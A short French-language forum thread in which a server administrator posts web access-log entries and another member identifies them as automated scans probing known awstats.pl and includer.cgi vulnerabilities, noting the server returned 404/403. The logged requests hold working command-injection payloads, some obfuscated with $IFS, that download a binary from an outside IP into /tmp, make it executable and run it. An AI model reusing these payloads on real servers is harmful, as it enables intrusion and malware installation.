Traces dans acces.log

[paper mate]

Bonsoir,

j'ai installé sme 7.0b5 sur mon serveur relié à internet.
En regardant dans les logs d'accès du serveur http j'ai remarqué ces lignes.

Code: Tout sélectionner

xxxxxxxxxxxxx 212.202.247.59 - - [16/Nov/2005:13:11:15 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftm
p%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/
1.1" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

xxxxxxxxxxxxx 212.202.247.59 - - [16/Nov/2005:13:11:16 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd
%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo
|  HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"


xxxxxxxxxxxxx 200.67.248.198 - - [16/Nov/2005:16:59:33 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftm
p%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo|  HTTP/1.1
" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

xxxxxxxxxxxxx 200.67.248.198 - - [16/Nov/2005:17:00:34 +0100] "GET /scgi-bin/includer.cgi?|cd$IFS/tmp;wget$IFS`e
cho$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.24
4| HTTP/1.1" 404 219 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
xxxxxxxxxxxxx 200.67.248.198 - - [16/Nov/2005:17:00:36 +0100] "GET /includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"
$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1
.1" 403 214 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
xxxxxxxxxxxxx 200.67.248.198 - - [16/Nov/2005:17:00:38 +0100] "GET /cgi-bin/include/includer.cgi?|cd$IFS/tmp;wge
t$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101
.193.244| HTTP/1.1" 404 226 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
xxxxxxxxxxxxx 200.67.248.198 - - [16/Nov/2005:17:00:40 +0100] "GET /scgi-bin/include/includer.cgi?|cd$IFS/tmp;wg
et$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.10
1.193.244| HTTP/1.1" 404 227 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"




Bon pour la première adresse je peux penser qu'il regarde si j'ai awstats pour tester une faille peut être mais pour les secondes traces que fait il ?

Je me suis dis également que mon proxy était peut être ouvert ? Existe t il une façon de le savoir ?

Merci par avance pour vos idées ou vos lumières.

[sibsib]

Salut,

Tu es tombé sur un automate qui cherche des défaillances connues.

La première dans awstats, la seconde dans includer.cgi.

La bonne nouvelle, c'est que ton SME a bien réagi : il a systématiquement répondu 404 (= not found) (Une fois 403 : forbiden)
Donc : pas de problèmes


A+,
Pascal

[paper mate]

Merci beaucoup pour ta réponse rapide.